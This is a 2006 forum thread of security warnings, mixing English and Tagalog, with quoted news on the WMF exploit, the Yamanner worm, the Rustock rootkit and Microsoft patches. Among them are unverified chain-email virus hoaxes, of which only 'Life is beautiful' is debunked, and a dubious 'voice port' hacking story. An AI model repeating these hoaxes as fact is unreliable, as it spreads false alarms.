PMT Forum
Do you want to make money today? :)

Virus/Exploit/Security Warnings

koyut · 81 · 34014

cyclops

  • Forum Tambay 200
  • ***
    • Posts: 255
    • Likes Received: +0/-0

chavarlison

  • Grand Admiral Thrawn
  • Forum Master 300
  • ***
    • Posts: 332
    • Likes Received: +0/-0
hello firefox users, i have a problem with downloading anything from the browser may it be critical update or plugins, nakakadownload lang ako kapag sinave ko manually tpos open ko program and run it. you guys know what i did wrong?


louie929

  • Junior Member
  • **
    • Posts: 33
    • Likes Received: +0/-0
Got this from one of the blogsite I read.  Remenber that it's an IMAGE exploit.  Even if your using FIREFOX, please check if your using a version higher than 1.0.4

Quote
   Surfing just got more dangerous..
    Windows image file exploit W32/PFV-Exploit
    www.f-secure.com/weblog/arch…5.html#00000752

    Those using IE or any browser using IE engine like Avant or Maxthon to surf might wanna consider switching to Firefox or Opera.

    Those with Firefox 1.0.4 and below, you might wanna upgrade to a higher release.

    If you have not done so, best to also uncheck the “Allow websites to install software” and “Enable Java” in FF whenever you surf.
    Tools -> Options -> Web Features

    Quote:
    excerpt…

    Note that you can get infected if you visit a web site that has an image file containing the exploit. Internet Explorer users might automatically get infected. Firefox users can get infected if they decide to run or download the image file.

    In our tests (under XP SP2) older versions of Firefox (1.0.4) defaulted to open WMF files with “Windows Picture and Fax Viewer”, which is vulnerable. Newer versions (1.5) defaulted to open them with Windows Media Player, which is not vulnerable…but then again, Windows Media Player is not able to show WMF files at all so this might be a bug in Firefox. Opera 8.51 defaults to open WMF files with “Windows Picture and Fax Viewer” too. However, all versions of Firefox and Opera prompt the user first.

Switch to Firefox(Latest version is 1.5) today. Especially for those people who’s into 12 DailyPro and other autosurfs. You can check out the button on the bottom right on our sidebar. It’s free & integrates with Google toolbar, nifty.


beezymouse

  • Probie
  • **
    • Posts: 18
    • Likes Received: +0/-0
That's waht they call BUFFER OVERRUN.
sa Windows family of OS sobrang dami yan kaya dapat lagi update windows. :)


cyclops

  • Forum Tambay 200
  • ***
    • Posts: 255
    • Likes Received: +0/-0
I got this from AutoSurf Alert

Quote
~ASA~ Warning Alert


PLEASE SEND THIS TO EVERYONE ON YOUR CONTACT LIST!!

A new virus has just been discovered that has been classified by
Microsoft as the most destructive ever. This virus was discovered
yesterday afternoon by McAfee. This virus simply destroys Sector
Zero from the hard disk, where vital information for its functioning
are stored.

This virus acts in the following manner:
It sends itself automatically to all contacts on your list with the title:

"A Card for You".

As soon as the supposed virtual card is opened the computer freezes
so that the user has to reboot. When the ctrl+alt+del keys or the reset
button are pressed, the virus destroys Sector Zero, thus permanently
destroying the hard disk. Yesterday in just a few hours this virus caused
panic in New York, according to news broadcast by CNN.

This alert was received by an employee of Microsoft itself.

So don't open any mails with subject: "A Virtual Card for You."
As soon as you get the mail, delete it!! Even if you know the sender !!!
Please pass this mail to all of your friends.
Forward this to everyone in your address book. I'm sure most people
like myself, would rather receive this notice 25 times than not at All

Best Regards,

Brian


careful folks:)


mistcast

  • Senior Member
  • **
    • Posts: 66
    • Likes Received: +0/-0

bladex

  • Forum Tambay 200
  • ***
    • Posts: 202
    • Likes Received: +0/-0

lx638

  • Moderation is Virtue
  • Forum Expert 500
  • ****
    • Posts: 544
    • Likes Received: +0/-0
kuha ko lang sa http://www.thehyipforum.com/message8646-.html

Quote


I came across this and I thought it might help someone on this forum. anything I can do to protect myself from hackers I want to know about. I know alot of people here use MSN and Yahoo messanger and other programs like that. anyhow hope it helps.

Quote
Dear Members,

I found out some information very recently that could makes it easy for hackers/keyloggers to get access to 12DailyPro member accounts (including payment processors).

I will narrate it as it happened to a friend of mine very recently. It goes thus:


He (my friend) was chatting with somebody he met in a yahoo messenger chat room for the first time. As the conversation progressed, the person he was chatting with told my friend his Username and Password (i.e my friend's user name and password).

My friend was in a state of shock. He now asked this "Hacker" how he got hold of his account details since that were at opposite end's of the earth. Fortunately the hacker decided to reveal how.

He (Hacker) said anytime anybody logs on to any of the instant messengers (Yahoo, MSN, Google Talk, Skype,PalTalk etc) and Creates a communication path with any body (as in the moment he starts chatting with any body) e.g. clicking on a member from his yahoo list or going into general chat rooms, a VOICE PORT is automatically opened.

It is thru this voice port that hackers take advantage and are able to get user names and passwords of any account open at that point in time and not just that of messaging software.

So this implies that if your 12dailypro/egold etc accounts are open while your messenger is on , then you are prone to attacks from hackers cause your voice port is open.

In that regard, make sure you are through (close all investment accounts) with all your surfing /investments accounts before you open any messaging software.

And vice versa, before you open any of your surfing/egold accounts, make sure you are not logged on to your instant messenger.


For those who do not know, Windows XP, Windows 2000and Windows 2003 have their own in built messenger for communicating with other nodes on the network which has a port (port 135) which may be open. If it is, go and close it using your firewall. If you cannot block it for some reason, disable it using the instructions below:


For Windows 2000 and XP

* Go to start and click Run
* Type services.msc
* Double-click on Messenger.
* In the Messenger Properties window, select Stop, then choose Disable as the Startup Type.
* Click OK.

For Windows 95, 98, and ME

* Under Control Panel, select Add/Remove.
* Select Windows Setup.
* Select System Tools.
* Click Details.
* Uncheck WinPopUp.
* Click OK.



At the end of the conversation, my friend then asked the hacker how he was able to know about all this. He (Hacker) replied his father works for a security agency and therefore put him through some of these hacking techniques. He (Hacker) claims that he does not take advantage of these loophole inherent in messaging software.

Well 12DailyPro members that is a penny for your thought.


chimeron

  • Forum Tambay 150
  • ***
    • Posts: 183
    • Likes Received: +0/-0
The only time na i-se-send mo yung username and password mo for login systems like 12dp is during the login procedure itself. After that, an encrypted sessionID na lang ang pina-pass ng browser mo sa 12dp site so you are stayed login.

HTTP is a stateless protocol, meaning walang permanent connection between web server and client browser. So walang constant stream of data na pwedeng ma-intercept.


aapuntar

  • Forum Master 400
  • ***
    • Posts: 402
    • Likes Received: +0/-0
Ang sa akin lang, use firefox browser or other mozilla based browser like netscape. Dump IE! :D

Sa totoo lang, everytime I use IE my spyware scanner always got these "tracking cookies". Saka noong IE pa talaga gamit ko, my PC was prone to viruses and spywares that make my PC crashed constantly.

Using firefox, I don't have that problem, even I'm chatting using any messenger. ewan ko lng sa inyo ha. :D

Pero ika nga ng mga experts, "There's nothing secure when you're online!"
« Last Edit: Feb 10, 2006, 09:55 AM by aapuntar »


chad

  • Senior Member
  • **
    • Posts: 99
    • Likes Received: +0/-0
yuor password on your email is the same as with the messenger.

data from your browsers can be intercepted by some patched application on your browser since they may be able to access any data coming from your browser. They could be, your toolbars! :D

and Firefox is not exempted.


chimeron

  • Forum Tambay 150
  • ***
    • Posts: 183
    • Likes Received: +0/-0
Avoid updating your McAfee virus definition files from un-updated download sites until further notice. A specific update is currently causing havoc in computer systems everywhere. McAfee has already issued a fix for the faulty DAT files but it may take some time before third party download sites can make the necessary updates.

http://www.informationweek.com/news/showArticle.jhtml?articleID=181503325
« Last Edit: Mar 15, 2006, 12:19 AM by chimeron »


trojsioux

  • Jill of All Trades
  • Forum Master 400
  • ***
    • Posts: 435
    • Likes Received: +0/-0
ngeeeehh, kabibili klang namin ng McAfee iyong all-in package nila...with antivirus, firewall, personal privacy service, adware...3 weeks ago lang.

haven't checked if meron ngang affected files...

thanks for the tip chimeron


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Thanks for the update, chimeron.

I used McAffee before, but have now transferred to Panda Antivirus
integrated with Anti-spyware with Firewall.

:cool:


lx638

  • Moderation is Virtue
  • Forum Expert 500
  • ****
    • Posts: 544
    • Likes Received: +0/-0
ngek.McAffee lng pede sakin eh. un lng pede update. direct naman ako update sa internet hindi na ung download ng DAT file. un ba sinasabi mo?

thanks. magpapalit na rin ako end of the month.


LuckyGold7

  • Forum Tambay 100
  • ***
    • Posts: 104
    • Likes Received: +0/-0
Ako rin,McAffee lang ang da best para sa akin.automatic update nman ung anti V ko.


chimeron

  • Forum Tambay 150
  • ***
    • Posts: 183
    • Likes Received: +0/-0
^ Two weeks ago pa yang balita na yan Lucky. OK na ngayon, solve na yung problem ng McAfee. :D


wataru

  • I @m n0 Sup3rmaN
  • Forum Expert 500
  • ****
    • Posts: 508
    • Likes Received: +0/-0
waaahh Mcafee gamit ko ano ba effect nya sa system pag nadownload mo mahilig pa naman me magdownload ng mga updates sa antivirus ko.


kahel

  • Forum Master 300
  • ***
    • Posts: 385
    • Likes Received: +0/-0
You could be a victim.  Check it out!

http://bl.net/forwards/gulvirus.html


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
The internet isn't as friendly as when it first started. Then, antivirus software was an option. Now it's already a must.

What complicates things are hoaxes that makes us see ghosts.

Wonder if anyone can come up with a near-to-perfect solution to all this.

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
When you talk about "Stardust," what comes to mind is something romantic, dreamlike, and something that's magical in a nice, feel-good way. In the story of Peter Pan, it's what helps kids fly when they're happy.

So stardust is good right? Generally, yes ... until some whacko comes along and ruins it for us. Read this,

Quote
Stardust virus lands on OpenOffice

Researchers at Kaspersky Lab have spotted what they believe is the first virus for OpenOffice, the open-source rival to Microsoft's Office productivity suite.

The virus, dubbed Stardust, is capable of infecting OpenOffice and StarOffice, which is sold by Sun Microsystems, a Kaspersky Lab researcher wrote on the Russian company's Viruslist Web site on Tuesday.

"Stardust is a macro virus written for StarOffice, the first one I've seen," the researcher wrote. "Macro viruses usually infect MS Office applications."

The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

So far, Stardust is a proof-of-concept virus, which means that it was created to demonstrate that an OpenOffice virus is possible. The virus has not been sent out in the wild and is not actually attacking people's systems.

The story is different for Microsoft Office applications: A yet-to-be-patched security hole in Word has been exploited in at least one recent cyberattack.

A new "macro virus" is like a blast from the past. Viruses have evolved significantly. Boot sector pests were around between 1986 to 1995, followed by macro viruses that exploited early Microsoft Windows operating systems, according to security company F-Secure. The advent of e-mail subsequently propelled e-mail viruses such as the "I Love You" and the Anna Kournikova virus.

http://news.zdnet.com/2100-1009_22-6078475.html?tag=nl.e589

 :cool:
« Last Edit: Jun 01, 2006, 09:53 AM by rma2003 »


nailbiter

  • Alalay ng
  • Moderator
  • *
    • Posts: 4,322
    • Likes Received: +1/-0
OT: Nagtaka ako sa title ng post, "StarDust: When It's Not Good for You." Fyi, stardust is street for cocaine.
« Last Edit: Jul 28, 2006, 11:33 AM by nailbiter »


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Oops! Sorry about that! Not really familiar with "talkies" concerning drugs.

 :cool:


DropZite

  • Forum Tambay 200
  • ***
    • Posts: 278
    • Likes Received: +0/-0
nagtaka nga rin ako sa title eh, kailan nga ba naging good yung stardust?


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Hmmm ... I guess if you're in Never-Never Land soaring the skies with Peter Pan and the gang  :)

 :cool:


kahel

  • Forum Master 300
  • ***
    • Posts: 385
    • Likes Received: +0/-0

nailbiter

  • Alalay ng
  • Moderator
  • *
    • Posts: 4,322
    • Likes Received: +1/-0
OT: Di ba fairy dust o pixie dust yung sa Peter Pan?


annanymous

  • Anonymous
  • Moderator
  • *
    • Posts: 2,068
    • Likes Received: +0/-0
Ako naman ang naisip ko nung nabasa ko yung word na "stardust", yung song ni Jose Mari Chan na "Perfect Christmas".  Yun pala virus ang tinutukoy ni rma2003.:)


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
OT: Di ba fairy dust o pixie dust yung sa Peter Pan?

Yes, but some have referred to it also as stardust.

Quote from: Annanymous
Ako naman ang naisip ko nung nabasa ko yung word na "stardust", yung song ni Jose Mari Chan na "Perfect Christmas".  Yun pala virus ang tinutukoy ni rma2003

Amazing how something good has been twisted by many today. I guess this is just a way to get back what has been perverted and restored back to its proper use.

 :cool:


aleckxis

  • Forum Master 400
  • ***
    • Posts: 465
    • Likes Received: +0/-0
Hello Guys!,

I Just recieved this warning to my email this morning lang.


Quote
Subject: VERY IMPORTANT WARNING!!!
   
VERY IMPORTANT WARNING


This is not a joke!
Please Be Extremely Careful especially if using internet mail such as
Yahoo, Hotmail, AOL and so on. This information arrived this morning
direct
from both Microsoft and Norton.

Please send it to everybody you know who has access to the Internet.
You may receive an apparently harmless email with a Power Point
presentation "Life is beautiful."

If you receive it DO NOT OPEN THE FILE UNDER ANY CIRCUMSTANCES, and
delete it immediately. If you open this file, a message will appear on
your
screen saying: "It is too late now, your life is no longer beautiful."
Subsequently you will LOSE EVERYTHING IN YOUR PC and the person who
sent it to you
will gain access to your name, e-mail and password.

This is a new virus which started to circulate on Saturday afternoon.
AOL has already confirmed the severity, and the antivirus software's
are
not capable of destroying it. The virus has been created by a hacker
who
calls himself "life owner."

PLEASE SEND A COPY OF THIS EMAIL TO ALL YOUR FRIENDS and ask them to
PASS IT
ON IMMEDIATELY.

Thought I would pass this on to my members,
Came from a VERY reliable source!

Admin
PD-Info

I'm not sure kung me nakatanggap na rin ng ganitong warning sa inyo.



rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Thanks Aleckxis,

Isa na naman to of the same ones I've been receiving.

Salamat for the warning.

 :cool:


2slick

  • Forum Champion 700
  • ****
    • Posts: 723
    • Likes Received: +0/-0

FutureGizmo

  • Admin
  • *
    • Posts: 5,077
    • Likes Received: +5/-0
Although tama lang na protektahan mo PC mo for possible viruses and other malicious software, itong email na 'to ay hoax so wag niyo na i-forward sa iba pang tao yung mail.

http://securityresponse.symantec.com/avcenter/venc/data/life.is.beautiful.hoax.html

Kapag nakatanggap kayo ng ganitong warnings, saka iba pang mails tulad nung kay Bill Gates o AOL-Microsoft, try nyo muna search kung hoax yung mail para wag niyo na i-forward yung mail sa iba.


aleckxis

  • Forum Master 400
  • ***
    • Posts: 465
    • Likes Received: +0/-0
Yun nga lang mahirap sa kin. Kahit na kailangang iforward ang mga emails na natatanggap ko, hindi ako mahilig mag forward kaya actually useless lang mga nagpapadala ng email sa kin. Mostly hindi ako talaga nagbubukas ng mga emails. Kaya ang email box ko baha sa unopened emails. Actually pa rin, disgrasya lang na naopen ko yang email na yan kc nagkamali ako ng click dahil kasunod siya ng email na ioopen ko sana. kaso parang medyo nadulas ang mouse ko kaya yan  ang na open. hehehe, anyways, mabuti na rin na na open ko rin siya, may nalaman din ako na impormasyon kahit na paano.


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Because of many demands for more security, Microsoft is unloading a lot of security patches in the following days ahead. Meron din sigurong kinalaman yung plano nilang mag-release ng complete protection packages. Paano nga namang maniniwala ang mga tao sa kanila - hindi nga nilang magawang secure ang environment nila.

Anyway, read all about it here,

Quote
Bumper crop of Microsoft patches on the way

Microsoft customers should brace for an onslaught of security updates.

As part of a monthly patching cycle, the software maker plans to release on Tuesday a dozen security bulletins with fixes for flaws. Nine of the bulletins address problems in Windows, two relate to Office and one to the Exchange e-mail server software.

At least one of the Windows and one of the Office alerts is deemed "critical," Microsoft's highest risk rating, the company said in a notice posted on its Web site Thursday.

Additionally, the June patches will permanently alter the way Internet Explorer handles Web programs called ActiveX controls. Microsoft introduced the change, which may affect how certain Web sites are displayed in the browser, two months ago. It gave Web developers a "compatibility patch" to give them time to adjust to the new process, but the June security updates will end that respite, Microsoft said.

Microsoft did not specify how many flaws its security updates will tackle, or say which components of Windows, Office and Exchange are being repaired. It has said that it plans to release a fix for a vulnerability in Word that has been exploited in at least one targeted cyberattack.

Over the past weeks, security researchers have reported several unpatched flaws in Internet Explorer, the Web browser component of Windows.

Last month, Microsoft released three security bulletins, two of which addressed issues in Windows and Exchange. Another was for a problem in Adobe Systems' Macromedia Flash software.

Also on Tuesday, Microsoft will release an updated version of its Windows Malicious Software Removal Tool. The software detects and removes common malicious code placed on computers.

The company gave no further information on the upcoming bulletins, other than stating that the fixes may require restarting the computer or server.

The Redmond, Wash., software maker offers advance notification about patches so people can get ready to install the updates.

Microsoft said it will host a Webcast about the new fixes on Wednesday at 11 a.m. PT.

http://news.zdnet.com/2100-1009_22-6081634.html?tag=nl.e589

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Whoops ... MS admits defeat here!

Quote
No fix for 'critical' hole in Windows 98, ME

Microsoft will not fix a serious flaw in Windows 98 and Windows Millennium Edition because a patch could break other applications.

The security bug relates to Windows Explorer and could let an intruder commandeer a vulnerable PC, Microsoft warned in April. The software maker has made fixes available for Windows Server 2003, Windows XP and Windows 2000, but it has found that eliminating the vulnerability in Windows 98 and ME is "not feasible," it said.

"To do so would require re-engineering a significant amount of a critical core component of the operating system," Microsoft said in a Thursday update to its MS06-015 security bulletin. "After such a re-engineering effort, there would be no assurance that applications designed to run on these platforms would continue to operate."

Instead, Microsoft recommends that people who still use the older operating systems protect their PCs by using a network firewall that filters traffic on TCP Port 139. "Such a firewall will block attacks attempting to exploit this vulnerability from outside of the firewall," it said.

The software maker even had trouble with its fix for Windows XP. It had to revise the update and release it a second time because the patch caused problems for people who used Hewlett-Packard Share-to-Web software or older Nvidia graphics drivers.

Microsoft is phasing out support for the older operating systems. Windows 98 was released in June 1998, Second Edition followed a year later, and Millennium Edition came out in 2000. Microsoft has been providing fixes for only "critical" flaws the past couple of years and is ending support altogether next month, after its planned July 11 patch release. Windows XP with Service Pack 1 reaches its end of support on Oct. 10, 2006.

Not providing fixes leaves users vulnerable, but software can't be supported forever, said Michael Sutton, a director at security intelligence company iDefense, a part of VeriSign. "At some point, any vendor has to make a business decision to cease product support, and these products are now 7 to 8 years old," he said.

The older Windows versions have never been secure, said Russ Cooper, a senior scientist at Cybertrust, a security vendor in Herndon, Va. "The lack of a 'critical' patch does not weaken these OSes. Instead, it should merely put an end to their perception that they were secure before this fault came to light," he said.

And as far as blocking traffic on port 139 goes, it is a network port that has been abused in the past for attacks, said Don Leatham, director of solutions and strategy at PatchLink. "Most organizations will already have port 139 blocked," he said. "Although it is good that Microsoft is reiterating this, I don't see it being a huge impact."

The best way to secure PCs that run older versions of Windows is upgrading the operating system, Microsoft suggested.

"With the upcoming end (of) support for these products, we strongly recommend that those of you who are still running these older versions of Windows upgrade to a newer, more secure version, such as Windows XP SP2, as soon as possible," Christopher Budd, a staffer in Microsoft's' security response center, wrote on the team's blog.

http://news.zdnet.com/2100-1009_22-6082307.html?tag=nl.e550

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Are you a Yahoo email user like I am?

Did you receive an email from someone you know and may be in your contact list with this subject, "New Graphic Site", like I did?

Then beware! DO NOT OPEN this email. It contains a virus that has infected a portion of the Yahoo database. You don't need to download any attachment. All you need is to click it open to be infected.

How do you combat this? Here, read more about it.

Quote
Worm wriggles through Yahoo mail flaw

A new worm that targets Yahoo e-mail users is on the loose, taking advantage of an JavaScript flaw, a security company has warned.

The Yamanner worm targets all versions of Yahoo Web-based mail except the latest beta version, Symantec said in an advisory released Monday.

At the time of the advisory, there was no patch for the vulnerability. But by later on Monday, Yahoo said it had come up with a fix for the flaw, which it said had affected very few of its customers.

"We have taken steps to resolve the issue and protect our users from further attacks of this worm. The solution has been automatically distributed to all Yahoo Mail customers, and requires no additional action on the part of the user," a Yahoo representative said.

Both Yahoo and Symantec are encouraging people to update the antivirus definitions on their PCs.

Yamanner arrives in a Yahoo mailbox bearing the subject header "New Graphic Site." Once the message is opened, the computer becomes infected and the worm spreads itself to people on the Yahoo e-mail contact list. The harvested e-mail addresses are also sent to a remote online server, which Symantec suspects may use the information for spam campaigns.

"The worm is taking a pretty novel approach," said Dean Turner, senior manager of Symantec Security Response. "It takes advantage of a JavaScript vulnerability, so the user doesn't even have to click on an attachment to get infected."

Yamanner exploits the Yahoo flaw by enabling the scripts that are embedded in HTML e-mails to be run by the user's Web browser.

The worm, which was spotted in the wild early this morning, has hit the remote server more than 100,000 times, forwarding Yahoo e-mail addresses harvested from unsuspecting users, Turner said.

Although the worm is spreading quickly, and no patch has been issued, Symantec is rating the threat a "2." The security vendor uses a 1-to-5 rating system, with "5" as its most severe category.

"Antivirus definitions have been released for it, and Yahoo is working on a patch, so we don't want to cry wolf," Turner said. "Although there is the potential the worm will affect a larger number of people, for now to raise it to another (higher) level would be inappropriate."

He added it is premature to predict whether this worm will morph into other forms and attack other browser-based forms of e-mail, such as Google's Gmail.

Systems affected include Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003 and Windows XP, according to Symantec's advisory.

http://news.zdnet.com/2100-1009_22-6082934.html?tag=nl.e589

 :cool:


nailbiter

  • Alalay ng
  • Moderator
  • *
    • Posts: 4,322
    • Likes Received: +1/-0
Tsk, tsk, ulupong talaga ang MS.

--------------------
Windows shortcut 'trick' is a feature: Microsoft

Munir Kotadia, ZDNet Australia
July 05, 2006
URL: http://www.zdnet.com.au/news/security/soa/Windows_shortcut_trick_is_a_feature_Microsoft/0,2000061744,39262246,00.htm


Microsoft has denied that a 'trick,' which could allow an executable file to be launched when a user types a Web address into Internet Explorer, is a security vulnerability.

Using Windows XP and Internet Explorer, it is easy to create a scenario where a user types in a Web address -- such as www.microsoft.com -- into their browser and instead of the launching the Web site, the browser runs an executable file that is located on the user's computer.

    To test the 'trick' yourself, try the following:

        * Right click on the Desktop and create a new Shortcut
        * Point the shortcut to an executable -- such as c:\windows\system32\calc.exe
        * Call the shortcut www.microsoft.com
        * Start Internet Explorer and type "www.microsoft.com" into the address bar

    If the shortcut is then deleted -- or the characters "http://" are added before the "www" in the browser address bar -- then IE will once again connect to the Internet as expected.

In a statement to ZDNet Australia on Tuesday, Peter Watson, chief security advisor at Microsoft Australia, said this is not a security vulnerability but actually a feature that could be used by legitimate applications.

"It's important to clarify the difference between security problems and legitimate features. A security hole helps an attacker do something they shouldn't be able to do, which is not the case in this instance.

"Software that the user legitimately has installed on the computer might need exactly this sort of feature provided by IE," said Watson.

According to Watson, the 'trick' could be used to help automation.

"For example, imagine if you needed to run a dialup connection to connect to a certain site. The dial up connection might be called "connect to mysite.com". You can see in that case how important it is for Windows (or any operating system) to have flexibility for legitimate software.

"Organisations or individual users may require or desire to automate part of the process for application connectivity with IE. Microsoft views this as one of the advantages in using IE as a means of enabling user access in that it provides users a consistent and seamless experience," said Watson.

However, security experts believe this particular 'trick' is unnecessary and expect it to be exploited by malware writers.

Michael Warrilow, director of Sydney-based analyst firm Hydrasight, told ZDNet Australia that he tested the 'trick' using Windows XP SP2 and found that although it worked using IE, Firefox users were safe.

"Microsoft's so-called useful features have been shown time and again to result in security exposures that are ultimately exploited for malicious purposes. This will be no exception," he said.

Frost and Sullivan Australia's security analyst, James Turner agreed: "I would imagine that malware writers could definitely exploit this -- particularly with a little social engineering."

--------------------




rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0

rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Ok, guys. Alam kong we need to update our OS frequently cuz that
should help secure our systems all the more. But beware this new worm
masquerading as a system update.

Got this from a newsletter,

Quote
*New Worm Pretends to be WGA Tool:

There is a new worm that pretends to be Microsoft's Windows Genuine
Advantage (WGA) anti-piracy tool. The Cuebot-K worm spreads via AOL
Instant Messenger, registering itself as a new system driver service called
'wgavn'. It carries the display name 'Windows Genuine Advantage
Validation Notification', and runs automatically during system startup. It you
view the list of services, it says that removing or stopping the service
will result in 'system instability'. Once in place the worm disables the
Windows firewall, and opens a backdoor to infected computers which allows
hackers to gain remote access, spy on users, and potentially launch distributed
denial-of-service attacks. "People may think they have been sent the
file from one of their AOL IM buddies, but in fact the program has no
friendly intentions," said Graham Cluley, senior technology consultant at
Sophos.


 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
My upline sent this warning to me,

Quote
There is currently a phishing e-mail doing the rounds which
claims to be from Worldpay. Often the sender is listed as
Dave Gollick and it usually refers to a chargeback against
your credit card.

It's a hoax of course - so if you receive it don't respond, don't
open any attachment - ideally just delete it without opening or
reading it.


 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Yet again, another threat to our PC Security - a new breed of Rootkits
that can elude detection. Man, these cyber terrorists are getting
creative. Read here,

Quote
Rootkits get better at hiding
By Joris Evers, CNET News.com
Published on ZDNet News: July 18, 2006, 6:35 PM PT

Forward in EMAIL Format for PRINT ZDNet Tags: Hacking Security Security applications/tools Symantec Corp Microsoft
A new Trojan horse is so good at hiding itself that some security researchers claim a new chapter has begun in their battle against malicious-code authors.

The new pest, dubbed "Rustock" by Symantec and "Mailbot.AZ" by F-Secure, uses "rootkit" techniques crafted to avoid the detection technology used by security software, Symantec and F-Secure said in recent analyses.

"It can be considered the first born of the next generation of rootkits," Elia Florio, a security response engineer at Symantec, wrote in a blog late last month. "Rustock.A consists of a mix of old techniques and new ideas that when combined make a malware that is stealthy enough to remain undetected by many rootkit detectors commonly used."

Rootkits are considered an emerging threat. They are used to make system changes to hide software, which may be malicious. In the case of Rustock or Mailbot.AZ, rootkit technology was used to hide a Trojan horse that opens a backdoor on an infected system, putting it at the beck and call of an attacker, according to Symantec.

In their continuing race with security software makers, the creators of this latest rootkit appear to have looked closely at the inner workings of detection tools before crafting their malicious code, said Craig Schmugar, virus research manager at McAfee, which calls the pest "PWS-JM."

"Security companies are trying to stay one step ahead of the bad guys, but the bad guys already have the technology that is available from the security vendors," he said. "A number of techniques have been combined to really strengthen and harden this particular threat. They have done a pretty good job at closing all the doors."

The mixture of cloaking methods makes Rustock "totally invisible on a compromised computer when installed," including on a PC running an early release of Windows Vista, Symantec's Florio wrote. "We consider it to be an advanced example of stealth by design malicious code."

To avoid detection, Rustock runs no system processes, but runs its code inside a driver and kernel threads, Florio wrote. It also uses alternate data streams instead of hidden files and avoids using application programming interfaces (APIs). Today's detection tools look for system processes, hidden files and hooks into APIs, according to Florio's post.

Additionally, Rustock defeats rootkit detectors' checks for the integrity of some kernel structures and the detectors' efforts to detect hidden drivers, Florio wrote. Furthermore the SYS driver the rootkit uses is polymorphic and changes its code from sample to sample, according to the blog posting.

Still, chances of people being attacked by this rootkit and its malicious Trojan horse payload are slim, experts said. "People are blogging about it not because it is highly prevalent, but because of the challenges it poses to existing rootkit detection tools," Schmugar said. Symantec and F-Secure also both state the threat is not widespread.

F-Secure updated its BlackLight rootkit detection tool that can detect current versions of the pest, the company said in a blog. Symantec and McAfee are still working on tools to detect and remove rootkits from computers.

http://news.zdnet.com/2100-1009_22-6095762.html?tag=nl.e550

 :cool:


rma2003

  • PMT Charter Member
  • PMT Jedi 2000
  • ****
    • Posts: 2,278
    • Likes Received: +0/-0
Just another thing to worry about,

Quote
Patch Tuesday--let the attacks begin

Commentary--Somewhere--perhaps in the United States, but more likely, somewhere in China--a man walks out of a nondescript building, casts his eyes upon the urban landscape around him after spending an eight-hour day staring at a computer screen, and lights a cigarette.

He does not know his bosses by name or by face; he knows only that he is paid, and paid pretty well, for his research. Like a legitimate computer-security researcher, he uses automated testing tools against Microsoft Office software, probing for buffer overflows, pointer errors or negative integers in Word, Excel and PowerPoint. Unlike a legitimate security professional, he does not report what he finds to Microsoft.

Instead, either he or his bosses will use this information for corporate espionage, to create what's called a zero-day attack, using targeted Trojan horses that exploit an unpublished flaw. Worse, they'll wait until after Microsoft publishes its latest patches on the second Tuesday of the month. They'll release their attacks the day after, when everyone's distracted by the new patches--a day we'll call "Zero-day Wednesday."

Patch Tuesday under attack
Just a few years ago, Microsoft would, out of the blue, announce a handful of patches, some critical, some not. The problem is--well, there are many problems.

First, Microsoft found it hard to inform everyone of the critical nature of the more serious vulnerabilities, especially if the announcement went out on Friday afternoon at 3 p.m. Worse, say someone did notice and hurriedly applied the patch, only to find on Saturday morning that it broke some functionality somewhere else in the system. Who would pay the overtime?

So--for the last two years, with only minor exceptions--Microsoft has announced its patches on the second Tuesday of each month. System administrators plan on it, and the general public has come to expect it. On rare occasions, Microsoft has reissued a patch or two.

But software vulnerabilities don't follow timetables. In May, the day after Microsoft released three updates, someone released a Trojan horse based on a previously unknown flaw (also known as a "zero-day" flaw) in Microsoft Word; Microsoft patched this in MS06-027. In June, after Microsoft patched 21 individual vulnerabilities, there was a zero-day attack on Excel files; Microsoft patched this in MS06-037.

And now, in July, after Microsoft patched 18 flaws, someone has released a zero-day attack on PowerPoint files. Microsoft says it'll patch this flaw on the next Patch Tuesday. However, within the last few days, we've seen at least three distinct backdoor Trojans using the PowerPoint flaws, with more Trojans possible before Aug. 8 this year.

Spear-phishing
Should home users worry? Not yet. These PowerPoint Trojans are not broadcast scattershot across the Internet like the large-scale virus attacks we've all grown to expect during the summer. Instead, these Trojans are targeted so that the victim companies won't realize they've been hit until after the fact. The bad guys are taking advantage of the common practice of sending and receiving Office files, making their poisoned e-mail look like legitimate interoffice traffic.

To do so, the bad guys have to be sophisticated; they have to be organized. One uses Google to research target companies, perhaps identifying legitimate e-mail groups within a target. Using a process known as spear-phishing, a criminal hacker can fashion an internal e-mail with subject lines like "Here are the Q1 sales figures," and the e-mail might be sent to "sales team alpha" from "sales internal." Someone receiving that e-mail wouldn't necessarily suspect the Excel to be poisoned.

